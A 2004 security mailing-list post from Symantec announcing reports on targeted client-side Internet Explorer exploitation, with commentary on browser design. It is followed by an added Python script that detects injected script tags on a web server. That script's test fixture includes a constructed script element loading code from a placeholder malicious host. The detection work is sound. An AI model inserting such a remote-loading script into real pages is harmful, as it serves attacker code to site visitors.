Symantec DeepSight Threat Management System Analysis: Client-side Exploitation

From: David Ahmad (da_at_securityfocus.com)
Date: 06/25/04

    Date: Fri, 25 Jun 2004 12:46:35 -0600
    To: bugtraq@securityfocus.com, incidents@securityfocus.com

    Good day,

    Symantec has made two reports available to the public, listed at
    the end of this post. These documents describe instances of
    client-side exploitation. At least one instance appears to
    involve an attacker with criminal intent targeting an individual
    at a financial institution.

    I'm going to do something I almost never do (and try to
    avoid), and that's deliver a frank soapbox rant. Before that,
    I would like to acknowledge the work of the following individuals,
    without whom, many of these threats would remain unknown
    (apologies to any I've left out):

    http-equiv
    Liu Die Yu
    Drew Copley & eEye
    Jelmer
    Georgi Guninski
    GreyMagic Security
    Dror Shalev
    Thor Larholm
    Roozbeh Afrasiabi
    Andreas Sandblad
    Marc Slemko

    Client-side exploitation is nothing new. We have seen and
    discussed the potential risk posed by Microsoft Internet
    Explorer (and to a lesser extent, other client applications)
    for some time. In fact, Symantec Internet Security Threat
    Reports in the past have warned repeatedly of these issues
    specifically as future threats.

    There is really no surprise, though. It was only a matter of
    time before attackers caught on. I've said this before -- it's
    difficult for me to think of a better class of vulnerabilities:
    no dependence on version or memory layout or any other such messy
    factors, firewalls are totally irrelevant and VPNs become basically
    a free ride in, the browser doesn't end up crashing (i.e. the
    victim remains blissfully unaware that they've been owned)...
    and there seems to be an endless supply of new tricks to use,
    thanks to the labyrinthine complexity of components, subcomponents
    and the genetically mutated Frankenstein* of an access control
    mechanism that is supposed to hold it all together. Finally, to
    top it all off, when a bug has been patched... you never know if
    it has really been patched, because you're not even entirely
    sure where or what the bug is. Often these vulnerabilities are
    not single flaws, but combinations of bad behavior and weaknesses
    put together. Fix one avenue of attack and it only takes the
    discovery of another (usually code execution in Local Zone) to
    recreate the original attack. Recall the longevity of "CODEBASE"
    and other similar "non-vulnerabilities".

    Part of the problem is that MSIE has the worst feature creep that I
    have ever seen. This "thing" is now used as, fundamentally, an
    interface presentation tool. The browser is used for anything and
    everything you could possibly want it to: e-mail, applications,
    file management, multimedia... and where the browser as an entire
    application isn't used, the HTML rendering component often is.

    I do my best to maintain an unbiased stance. I think that the
    other browsers are probably just as bad, to the extent possible as
    they are not as complex and integrated into the operating system
    as MSIE. But this is the reality, folks.

    Microsoft's effort so far to understand and fix these problems one
    at a time is commendable. They are probably the best commercial
    vendor for responding to and correcting security issues.

    On the bright side, XP SP2 looks like it makes some desperately
    needed changes. Let's hope a fundamental redesign is in the works
    too, because that looks like the only solution to me.

    Until then, try to make the most of your Interweb experience with
    basically every option in the MSIE security settings set to
    "Disable". Then again, why bother worrying about another
    hole in IE, or anything else for that matter. The average home PC
    is already beyond compromised with about 50 different individual
    instances of malicious code and IRC bots and spyware all competing
    with each other to log keystrokes, turn on your webcam and bind
    backdoor servers to listening ports.

    Cheers.

    * e.g. tripping on "document" vs "Document"

    --
    The reports are available at:
    http://tms.symantec.com/ClientSideExploitation.asp

    Client-side Exploits: Forensic Analysis of a Compromised
    Financial Services Laptop

    This document details the forensic analysis of a machine
    compromised through the use of a client-side vulnerability.
    The evidence gathered in this analysis strongly suggests that
    this client-side attack was used to specifically target a
    financial institution, with the goal of retrieving the necessary
    authentication credentials to escalate the initial attack to
    further compromise other related systems. The analysis of
    this compromise provides us with a real-world example of
    targeted attacks against a specific company, in this case, a
    company in the Financial Services sector, using a client-side
    attack vector. Although not new, the targeted exploitation of
    client-side vulnerabilities has not seen extensive documentation
    or analysis. This analysis aims to provide the reader with a
    detailed description of an actual attack exploiting a client-side
    vulnerability.
    http://tms.symantec.com/documents/040617-Analysis-FinancialInstitutionCompromise.pdf

    Compromised IIS Server / Unpatched Internet Explorer
    Vulnerability Exploitation Alert

    The DeepSight Threat Analyst Team has become aware of various
    public reports of Microsoft Internet Information Services (IIS)
    servers being attacked and subsequently compromised. As a second
    component of the compromise, a malicious JavaScript is hosted
    on the infected IIS system and inserted into files served from
    that system. This document contains information about the
    vulnerabilities used and the subsequently deployed malcode, which
    is not available elsewhere. The malicious JavaScript in question
    is designed to compromise client systems through multiple known,
    but unpatched, vulnerabilities in Internet Explorer. The resulting
    client-side infection includes, among other things, a keystroke
    logger. The Threat Analyst Team has manually captured a sample of
    the IE exploit, and the resulting binary, in the DeepSight Honeynet
    system. Further investigation of the exploit resulted in the
    conclusions described below. UPDATE: This Threat Alert has been
    updated to include additional information about the client-side
    exploits used in this attack. Additional information about other
    associated files has also been added.
    http://tms.symantec.com/documents/040624-Alert-CompromisedIISServerReports.pdf
    -- 
    David Mirza Ahmad
    Symantec 
    PGP: 0x26005712
    8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12
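    The second report describes a server-side foothold being used to serve
    client-side exploits: a script block inserted into pages served from a
    compromised IIS host. One defensive check that follows from that
    description is to compare what the server actually serves against the
    content baseline and flag script elements that were not deployed or that
    load from hosts outside an allow-list. The script below is an added
    example, not code from the post or from the Symantec reports; the HTML
    pages and the injected hostname in it are constructed placeholders.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample input (not taken from the report): the page as deployed
# from the content baseline, and the same page as captured from the server
# after a script element has been appended to the served output.
BASELINE_HTML = (
    "<html><head><title>Account Login</title></head>\n"
    "<body><form action=\"/login\" method=\"post\">"
    "<input name=\"user\"><input name=\"pass\" type=\"password\"></form>\n"
    "<script src=\"/static/site.js\"></script>\n"
    "</body></html>\n"
)

# Placeholder host; the hosts involved in the real incident are not reproduced here.
INJECTED_HOST = "malicious.example.invalid"
SERVED_HTML = BASELINE_HTML + (
    f"<script src=\"http://{INJECTED_HOST}/loader.js\"></script>\n"
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def content_hash(html: str) -> str:
    """SHA-256 of the document text, used to compare served output to the baseline."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def script_blocks(html: str) -> list[str]:
    """Every <script>...</script> element in document order."""
    return SCRIPT_RE.findall(html)


def external_script_hosts(html: str, trusted_hosts: set[str]) -> list[str]:
    """Hosts of script src= URLs that are not on the allow-list.

    Relative URLs have no host (same origin as the page) and are skipped.
    """
    hosts = []
    for block in script_blocks(html):
        match = SRC_RE.search(block)
        if not match:
            continue
        host = urlparse(match.group(1)).hostname
        if host and host.lower() not in trusted_hosts:
            hosts.append(host.lower())
    return hosts


def trailing_markup(html: str) -> str:
    """Content after the closing </html> tag; appended injections land here."""
    idx = html.lower().rfind("</html>")
    if idx == -1:
        return ""
    return html[idx + len("</html>"):].strip()


def audit_page(baseline: str, served: str, trusted_hosts: set[str]) -> dict:
    """Compare a served page to its baseline and report injection indicators."""
    baseline_scripts = set(script_blocks(baseline))
    new_scripts = [s for s in script_blocks(served) if s not in baseline_scripts]
    return {
        "hash_matches": content_hash(baseline) == content_hash(served),
        "new_scripts": new_scripts,
        "untrusted_hosts": external_script_hosts(served, trusted_hosts),
        "trailing_markup": trailing_markup(served),
    }


if __name__ == "__main__":
    report = audit_page(BASELINE_HTML, SERVED_HTML, {"www.example.com"})
    for key, value in report.items():
        print(f"{key}: {value}")
```

    The hash comparison catches any change at all; the script-level checks
    tell an analyst what changed and whether the new element pulls code from a
    host the site never used, which is the indicator that matters when a web
    server is being used as a delivery point for client-side exploits.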
    